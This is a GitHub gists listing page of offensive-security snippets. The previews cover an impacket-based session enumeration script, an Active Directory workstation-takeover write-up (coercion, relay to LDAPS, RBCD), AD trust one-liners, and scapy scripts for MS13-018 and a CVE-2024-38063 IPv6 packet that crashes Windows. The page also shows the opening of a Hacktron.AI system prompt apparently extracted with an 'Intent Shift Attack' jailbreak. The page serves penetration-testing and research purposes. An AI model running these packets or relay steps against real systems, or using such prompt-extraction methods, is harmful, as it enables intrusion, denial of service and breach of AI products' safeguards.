Skip to content

Instantly share code, notes, and snippets.

View ThanniKudam's full-sized avatar
:octocat:
Time Travelling..

WaterBucket ThanniKudam

:octocat:
Time Travelling..
49 followers · 128 following
View GitHub Profile
@ThanniKudam
ThanniKudam / Get-LoggedOn.py
Created August 11, 2024 18:20 — forked from GeisericII/Get-LoggedOn.py
Stupid simple script copied and pasted from reg.py/lookupsid and inspired from itm4n's session enum via registry
#!/usr/bin/python3
from __future__ import division
from __future__ import print_function
import re
import codecs
import logging
import time
import argparse
import sys
from impacket import version
@ThanniKudam
ThanniKudam / Workstation-Takeover.md
Created August 11, 2024 18:20 — forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@ThanniKudam
ThanniKudam / 1) Active Directory One Liners
Created August 11, 2024 18:21 — forked from oXis/1) Active Directory One Liners
Some Pentesting Notes
Retrieves all of the trust relationships for this domain - Does not Grab Forest Trusts
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
Grab Forest Trusts.
([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships()
@ThanniKudam
ThanniKudam / ms13-018.py
Created November 3, 2024 09:43
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
from time import sleep
import sys
conf.verb = 0
SPORT= RandNum(1024, 65535)
my_seq = 1000
@ThanniKudam
ThanniKudam / CVE-2024-38063.py
Created December 31, 2024 09:43
#Microsoft Windows: CVE-2024-38063: Windows TCP/IP Remote Code Execution Vulnerability
#Couldn't find a way to escalate it to RCE (Skill Issues). This PoC will trigger BSoD :)
from scapy.all import *
IPAddr = '' # Target's IPV6 Address
MACAddr = '' # Target's MAC Address
ExtHdrDestOpt = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0xC2)])
ExtHdrFragment = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrFragment()
@ThanniKudam
ThanniKudam / interact.py
Last active October 26, 2025 07:54
dreadnode interact cli
"""If you are doing dreadnode challenges, this code will help you to interact with the server easily via cli."""
#!/usr/bin/env python3
"""
Enhanced dreadnode_cli.py
Beautiful terminal interface for Dreadnode CTF challenge interaction and flag submission.
"""
import os
import sys
@ThanniKudam
ThanniKudam / hacktron-systemprompt.md
Created November 22, 2025 03:42
Hacktron.AI system prompt - Technique used: Intent Shift Attacks - Reference: https://arxiv.org/html/2505.17519v2

<complete_system_prompt>
You are hacktron, a powerful security research assistant.

## Mission